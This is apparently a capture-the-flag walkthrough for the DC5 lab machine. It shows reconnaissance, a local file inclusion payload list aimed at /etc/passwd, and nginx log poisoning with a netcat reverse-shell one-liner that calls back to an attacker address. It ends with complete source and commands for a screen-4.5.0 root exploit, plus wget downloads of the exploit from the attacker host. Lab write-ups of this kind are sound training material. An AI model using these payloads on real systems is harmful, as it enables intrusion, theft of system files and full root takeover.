# DC5

## Nmap

```
sudo nmap 192.168.184.26 -p- -sS -sV

PORT      STATE SERVICE VERSION
80/tcp    open  http    nginx 1.6.2
111/tcp   open  rpcbind 2-4 (RPC #100000)
38106/tcp open  status  1 (RPC #100024)
```

Port 80 on the target machine take us to the following web page. Multiple sub pages include non-english text and after translating random paragraphs found this is mostly gibberish.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-85f3e45925e362011e339cfd90339d069e68bdbe%2Fimage.png?alt=media)

Clicking the home button takes us to the same page but we notice this time we are on /index.php. I then ran feroxbuster against the target site to identify more pages.

```
feroxbuster --url http://192.168.184.26 -w /usr/share/seclists/Discovery/Web-Content/raft-large-files-lowercase.txt -s 200,300,301 -x php 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ec7feb5eee42f7a988bece0cc2a62ff8f174e057%2Fimage.png?alt=media)

Checking out contact.php and it appears to be the only page to take some form of input.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-f6a3eb3f7e5acdcacf25b08fc808416a6b4cb54d%2Fimage.png?alt=media)

After submitting some test information we are directed to /thankyou.php where the URL contains our input from the previous page.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-518f70bf5ef32af5597e92de8c5aaa1e5296cf95%2Fimage.png?alt=media)

At this point I decided to test thankyou.php? for command injection. I caught the request in `Burpsuite` and sent it to intruder. I then set the payload variable as below.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6f24f5410d4908994ee32ad150b96891509c0837%2Fimage.png?alt=media)

I then added the command injection list as shown below as the payload.

```
cmd=../../../../../etc/passwd
?exec=../../../../../etc/passwd
?command=../../../../../etc/passwd
?execute../../../../../etc/passwd
?ping=../../../../../etc/passwd
?query=../../../../../etc/passwd
?jump=../../../../../etc/passwd
?code=../../../../../etc/passwd
?reg=../../../../../etc/passwd
?do=../../../../../etc/passwd
?func=../../../../../etc/passwd
?arg=../../../../../etc/passwd
?option=../../../../../etc/passwd
?load=../../../../../etc/passwd
?process=../../../../../etc/passwd
?step=../../../../../etc/passwd
?read=../../../../../etc/passwd
?function=../../../../../etc/passwd
?req=../../../../../etc/passwd
?feature=../../../../../etc/passwd
?exe=../../../../../etc/passwd
?module=../../../../../etc/passwd
?payload=../../../../../etc/passwd
?run=../../../../../etc/passwd
?print=../../../../../etc/passwd
?file=../../../../../etc/passwd
```

Ensure URL encoding is turned off as this was causing incorrect results as it was encoding `'?'`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-93f615de1f531fa6eadef7e20977a26209912624%2Fimage.png?alt=media)

Viewing the results of the payload after show that the `?file=` parameter appears to be vulnerable due to the content length being greatly different form the other values.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9bb117507aedf42c64e8cbbfe748933bc47b8c81%2Fimage.png?alt=media)

Viewing this in the browser shows us valid results.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-b8b919ba6e3b1658369369416d4d14b24e838e3f%2Fimage.png?alt=media)

We can fuzz for further files using `wfuzz` and the command below:

```
wfuzz -c -w lfi.txt --hl 42 http://192.168.184.26/thankyou.php?file=../../../../../../../FUZZ
```

The LFI list can be downloaded from here

{% file src="<https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-8f0bbe6ec0f91f0aaced8b7fff9d7dc6ddbbb34f%2Flfi.txt?alt=media>" %}
LFI list
{% endfile %}

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ed25c99e1405ebff3d05c74d5dd4237840be3199%2Fimage.png?alt=media)

We have two interesting LFI paths found once `wfuzz` completes:

```
/var/log/nginx/access.log
/var/log/nginx/error.log
```

Checking out access.log we can see requests we have made.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-73c9ef8bac975112ad8724fd5bd700afe3663e31%2Fimage.png?alt=media)

We can capture a request in `Burpsuite` and inject a PHP reverse shell into the User-Agent field. When the code is injected into the log we are able to get a reverse shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4862f5013379a2919d5644ceff5cd6ca76a1861a%2Fimage.png?alt=media)

Where the code snippet below is used for the RCE:

```
<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.211 80 >/tmp/f') ?>
```

With a netcat listener listening we can then access the log files again at: <http://192.168.211.26/thankyou.php?file=../../../../../../../var/log/nginx/access.log>

When we attempt to load the log files the page should hang and we get a reverse shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-23f6d546c2734b08f0155ffcda191eae5f6b45fb%2Fimage.png?alt=media)

Searching for SUID commands on the machine find the binary screen-4.5.0 has the SUID bit set.

```
find / -perm -u=s -type f 2>/dev/null 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a0b823061132a89179e61e4882526a68c4c0a233%2Fimage.png?alt=media)

Researching on Google shows a local privilege escalation exploit for this binary version.

{% embed url="<https://github.com/XiphosResearch/exploits/tree/master/screen2root>" %}

We first need to create some files and break down the script to get this to work. Follow the instructions below to achieve shell.

{% tabs %}
{% tab title="libhax.c" %}

```
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
```

{% endtab %}
{% endtabs %}

**Compile libhax.c**

`gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c`

{% tabs %}
{% tab title="rootshell.c" %}

```
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
```

{% endtab %}
{% endtabs %}

**Compile rootshell.c**

`gcc -o /tmp/rootshell /tmp/rootshell.c`\*\* \*\*

Create exploit bash script.

{% tabs %}
{% tab title="exploit.sh" %}

```
#!/bin/bash

cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so"
echo "[+] Triggering..."
screen -ls 
```

{% endtab %}
{% endtabs %}

Upload compiled files to target machine.

```
wget http://192.168.49.211/rootshell
wget http://192.168.49.211/libhax.so
wget http://192.168.49.211/exploit.sh
```

Once uploaded make the bash script executable:

```
chmod +x exploit.sh
```

Execute exploit.sh then after run `/tmp/rootshell` to gain shell as root.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-02230c51a3b5ea63c8d0f48f78ff675373b23a13%2Fimage.png?alt=media)